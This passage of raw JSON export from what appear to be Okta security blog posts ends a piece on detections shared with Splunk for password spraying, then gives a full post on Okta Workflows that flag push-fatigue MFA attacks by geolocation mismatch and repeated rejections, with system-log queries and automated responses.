\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tactic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Brute Force: Password Spray\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta provides a platform detection for failed password events across multiple user accounts. 
More info \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"here\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.threat.detected\\\" AND outcome.reason co \\\"Password Spray\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk Analytic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://research.splunk.com/application/25dbad05-6682-4dd5-9ce9-8adecf0d9ae2/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"25dbad05-6682-4dd5-9ce9-8adecf0d9ae2\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Magic like this happens when best-in-class providers of security tools share knowledge, without any agenda outside of protecting our mutual 
customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A huge thanks to the authors and contributors in this initial effort:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"James Brodsky (Splunk)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Scott Dermott (Okta)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Michael Haag (Splunk)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"John Murphy (Okta)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Felicity Robson (Okta)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Jordan Ruocco (Okta)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To learn more, Splunk and Okta are hosting a joint session at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://conf.splunk.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\".conf23\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", the annual Splunk conference, scheduled for July 17-20, 2023 in Las 
Vegas.\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T18:48:30.571Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"<p>Brett Winterford is Vice President of Okta Threat Intelligence.  Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats.  Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. </br> Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank.  Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"},{"id":"40144a58-c93f-5b84-895a-5658f212b168","bio":{"bio":"<p>The Defensive Cyber Operations (DCO) team is responsible for detecting and responding to cyber threats that impact Okta or our customers via the Okta platform. 
Our intelligence-driven capability identifies the adversaries most likely to impact Okta and our customers, and prioritises our defensive capabilities based on the threats most likely to be realised.</p>"},"image":null,"name":"Defensive Cyber Operations","jobTitle":"","slug":"defensive-cyber-operations","node_locale":"en"}]},{"slug":"/pushfatigueworkflows","id":"62442b90-3fdb-5a1e-9122-e58f0eb81b96","title":"Using Workflows to Respond to Anomalous Push Requests","date":"2023-04-24T05:57:22+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“Push fatigue” is a noisy form of attack that generates numerous detection opportunities.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In a “push fatigue” attack (sometimes called “MFA bombing”), an attacker already in possession of a user password triggers push notifications, often in rapid succession, to trick or frustrate the legitimate user into allowing access. 
The attacker gains unauthorized access to the account if the user approves the request out of habit or under the assumption of system error.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The most strategic, long-term way to counter these attacks (and many others) is to migrate users to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/09/phishing-resistance-and-why-it-matters\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"phishing-resistant authenticators\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" such as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2022/11/a-deep-dive-into-okta-fastpass/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta FastPass\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/configure-webauthn.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"FIDO2 WebAuthn authenticators\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/smart-card-authenticator.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Smart Cards\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The next best solution - albeit a tactical one - is to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/Number-Challenge-for-Okta-Verify?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"apply number 
challenges\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to push requests.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If your organization isn’t in a position to make these changes, we recommend introducing detections that identify suspicious push requests, as well as workflows for automating your response to suspicious events.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Security previously \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/shareddetections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"published logic\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" used by our detection engineering team to identify malicious push requests. This detection, alongside others, has been added to the content libraries of security analytics tools like Splunk.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/workflows-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Workflows\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", our no-code automation tool, offers opportunities to automate responses to suspicious requests in close to real-time, using the same underlying logic.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In this post, we’ll discuss two flows that evaluate the trustworthiness of a Verify Push request according to different 
criteria:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Variations in the geolocation metadata captured by the source of the request (the Okta SignIn Widget) and the response to the request (the Okta Verify app), and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multiple rejected push challenges by a user.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Workflow 1: Detect Suspicious Push Challenges\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/workflows-templates/tree/master/workflows/detect_suspicious_mfa_push_notifications\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"“Detect Suspicious Push Challenges” workflow\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" was developed for workforce customers using Okta Identity Engine.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The logic does not rely on user identification of a suspicious request. 
Instead, it determines whether the source of a Push Challenge (the “source event” generated by the Okta SignIn Widget) comes from a different location than the Okta Verify client that accepts or rejects the challenge (destination event):\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Engine\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Source Event\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Destination Event\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"system.push.send_factor_verify_push\\\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.authentication.auth_via_mfa\\\" AND debugContext.debugData.factor eq \\\"OKTA_VERIFY_PUSH\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The geolocation information (country, state, city) in each event is found in the client.geographicalContext 
object.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This week, a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/workflows-templates/tree/master/workflows/detect_suspicious_mfa_push_notifications\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"basic version of this flopack\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" was added to Okta’s extensive Workflows template library. The templated workflow checks if the two requests described above come from the same city. If the city does not match, a message with some of the relevant metadata is prepared for security operations teams.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are a range of other orchestrated responses available for “flogrammers” to consider, which are discussed below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Workflow 2: Detect Repeated User Rejections\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our alternative workflow addresses the “fatigue” aspects of a push fatigue attack. 
Okta solution engineer Sean Hanrahan has \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/workflows-templates/tree/master/workflows/detect_and_respond_to_mfa_fatigue_attacks\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"created versions for both Okta Identity Engine and Okta Classic\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The logic works as follows:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The flow triggers on user rejection of a push MFA prompt (see table below)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The flow stores data on sequential rejection events in tables\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If a user rejects a Push MFA request more than a configurable number of times (default: 5) in a configurable time threshold (default: 1 hour), a range of responses can be automated (see suggestions below the table).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The tables are purged at configurable 
intervals.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Engine\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Rejection Event\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.authentication.auth_via_mfa\\\" AND outcome.result=\\\"FAILURE\\\" and outcome.reason=\\\"INVALID_CREDENTIALS\\\" and debugContext.debugData.factor eq \\\"OKTA_VERIFY_PUSH\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq  \\\"user.mfa.okta_verify.deny_push\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Orchestrated Responses\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Both of these flows were designed to notify security operations analysts of suspicious activity in close to 
real-time. Okta Workflows comes with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/connector-reference.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"built-in connectors\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for messaging tools like Slack and Teams, email clients like Gmail and Office 365 Mail, or IT service management tools such as ServiceNow, Jira Service Desk, freshservice, PagerDuty, ZenDesk and more.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Workflows also offers opportunities to orchestrate differentiated responses based on the metadata observed in the events.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/workflows-templates/tree/master/workflows/detect_suspicious_mfa_push_notifications\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"template\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for Workflow 1, for example, security operations teams are notified when the location of push source and push response do not include the same city (client.geographicalContext.city). This is a good place for analysts to start evaluating the benign reasons why location information doesn’t match. 
After this analysis, you may also want to take different actions based on whether there is a mismatch in city, state or country data, or other network related information captured by these events.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"With a little tuning, your workflow might end up something more like this:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If the city matches, end the flow and take no action.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If the state matches, but the events came from different cities, send a message to the SOC.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If the events were in a different country, immediately revoke the session (using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/okta/actions/clearusersessions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Clear User Session\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" action card) and notify the SOC.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Workflow can further be extended to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Provide the SOC analyst a direct link/shortcut to the 
events of interest in the Okta Admin Console (Under \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Reports > System Log\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\").\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Provide the SOC analyst a history of how many times the user successfully authenticated from a given location in recent months (using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/okta/actions/searchsystemlogs.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Search System Logs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" action card)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Place users into a “higher risk” group that subjects them to higher assurance requirements for access to critical applications (using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/okta/actions/addnewusertogroup.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Add User to Group\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" action card)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Assess if the user successfully authenticated after repeated failure events (using the 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/okta/actions/searchsystemlogs.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Search System Logs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" action card), and in turn:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trigger a session revocation (using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/okta/actions/clearusersessions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Clear User Session\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" action card) and/or\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reset the user’s potentially compromised password (using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/okta/actions/resetpassword.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reset Password\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" action card)\",\"marks\":[],\"data\":{}}]}]}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Next Steps\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you'd like to get started with Workflow 1 (“Detect Suspicious Push 
Challenges”):\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Import the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/workflows-templates/tree/master/workflows/detect_suspicious_mfa_push_notifications\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"flopack\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" into your Workflows console.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Follow the instructions in the readme doc provided at GitHub to configure an Event Hook that triggers the flow on Verify Push MFA events.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Select a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/connector-reference.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"connector\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for which tool you want to use for SOC notifications.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Start testing!\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you’re at the RSA Conference in San Francisco this week, the “Detect Suspicious Push Challenges” flow will be showcased at the Okta 
booth.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For access to a pre-built template for Workflow 2 (“Detect Repeated User Rejections”), please ask your Okta Customer Success Manager.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"And if you’re just getting started with Workflows, we recommend this \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.youtube.com/playlist?list=PLIid085fSVdvyK8F4xuk49EchBPmAVNHG\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"YouTube channel\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for lots of great tutorials.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Thanks to Harish Chakravarthy and Bryan Barrows for testing and documenting these 